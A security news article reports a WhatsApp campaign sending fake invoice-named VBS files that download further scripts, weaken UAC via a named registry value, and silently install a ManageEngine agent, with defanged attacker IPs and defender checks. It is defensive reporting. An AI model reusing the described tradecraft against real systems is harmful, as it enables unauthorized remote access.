WhatsApp VBS Malware: Fake Documents Install Remote Access Tool

by Emma Davis
2 minutes ago

An active WhatsApp malware campaign is sending fake business-document VBS files to Windows users and installing a preconfigured remote management agent for attacker access.

A WhatsApp malware campaign is using fake business and finance documents to push malicious VBScript files to Windows users. Kaspersky said on June 22, 2026, that the campaign was still active and had affected users in multiple countries, with the largest share of observed infections in Malaysia.[1]

The lure is simple because it abuses trust. Victims receive a file from a known WhatsApp contact, often with no message text, and the attachment name looks like an invoice, bank statement, debt notice, payment list, tax form, or account statement. Kaspersky examples include Financial Reports.vbs, Debt confirmation.vbs, Account Statement.vbs, and localized names such as Sila semak bil anda.vbs.[1]

The practical risk is limited mainly to Windows systems using WhatsApp Desktop or WhatsApp Web. MyCERT separately warned that VBS attachments do not execute on iOS, Android, macOS, or Linux, and that mobile WhatsApp apps do not process these files as Windows executables.[2] That scope matters: if the file was only viewed on a phone, the risk is different from a Windows desktop where the user opened the attachment.

What the WhatsApp VBS malware does after the file opens

When the attachment is opened on Windows, it runs through Windows Script Host as WScript.exe. Kaspersky observed WhatsApp Desktop spawning the script from the app’s local attachment storage, while WhatsApp Web requires the downloaded file to be opened from the browser or Downloads folder.[1]

The first-stage script creates a working folder under C:UsersPublicDocuments, often with names such as Temp_<random> or MSUpdate_<random>. It then downloads two more VBScript payloads. Some variants hide the files and use renamed Windows utilities, including copies of curl.exe and bitsadmin.exe, to make the download activity look less obvious.[1]

The second stage attempts to weaken Windows User Account Control by targeting HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemConsentPromptBehaviorAdmin. It also downloads a ZIP archive, extracts it quietly, removes warning metadata in some variants, and launches another script to install a remote management package.[1]

The final payload is not a custom spyware binary. It is a preconfigured ManageEngine Endpoint Central agent, a legitimate remote monitoring and management tool that attackers abuse for persistent access. The package includes files such as DCAgentServerInfo.json, setup1.vbs, UEMSAgent.msi, and UEMSAgent.mst. Once installed silently with msiexec.exe, the agent can connect the victim computer to attacker-controlled management servers.[1]

Kaspersky listed several related management server IP addresses, including 202.61.160[.]208, 202.61.160[.]202, 202.61.160[.]201, 202.61.160[.]160, 202.61.160[.]137, and 38.55.151[.]63. It also noted infrastructure overlap with earlier ValleyRAT and Gh0st RAT activity, but assessed that the evidence was not enough for confident attribution.[1]

For home users and small offices, the immediate advice is direct: do not open .vbs, .vbe, .exe, .bat, .cmd, .js, or .ps1 files sent over WhatsApp, even from known contacts, until the sender confirms through a second channel. If the file was opened on Windows, disconnect the machine from the internet, change important passwords from a clean device, and treat banking, email, and WhatsApp two-factor codes entered on that machine as exposed.[2]

For defenders, the useful checks are process and file based. Look for wscript.exe launched by WhatsApp Desktop or a browser, suspicious VBS files in WhatsApp transfer folders or Downloads, hidden working directories under C:UsersPublicDocuments, renamed copies of curl.exe or bitsadmin.exe, unexpected msiexec.exe installation of Endpoint Central, and outbound traffic to the listed UEMS infrastructure. Microsoft documented similar WhatsApp-delivered VBS/MSI tradecraft earlier in 2026 and recommended blocking obfuscated scripts, monitoring renamed Windows utilities, and using endpoint rules that stop VBScript from launching downloaded executable content.[3]

This campaign also fits a broader pattern: attackers are moving malware through trusted messaging and business workflows rather than obvious email attachments. HowToFix readers who handle incident cleanup may also want to review our coverage of AiTM phishing that steals sessions, AnyDesk-style remote access abuse, and RAT infections that give attackers remote control.

References

  1. Kaspersky Securelist, “A VBScript campaign distributed through WhatsApp deploying RMM software,” June 22, 2026.
  2. MyCERT, “MA-1459.062026: Phishing Campaign Delivering VBS Malware via WhatsApp Desktop,” June 20, 2026.
  3. Microsoft Security Blog, “WhatsApp malware campaign delivers VBScript and MSI backdoors,” March 31, 2026.
  4. BleepingComputer, “WhatsApp phishing attack uses fake business docs to hack PCs,” June 22, 2026.

About the author

Emma Davis

Content editor and security writer focused on making malware-removal and scam-prevention guides easier to understand. Emma reviews structure, clarity, and source consistency before articles are published.

View all posts

Leave a Comment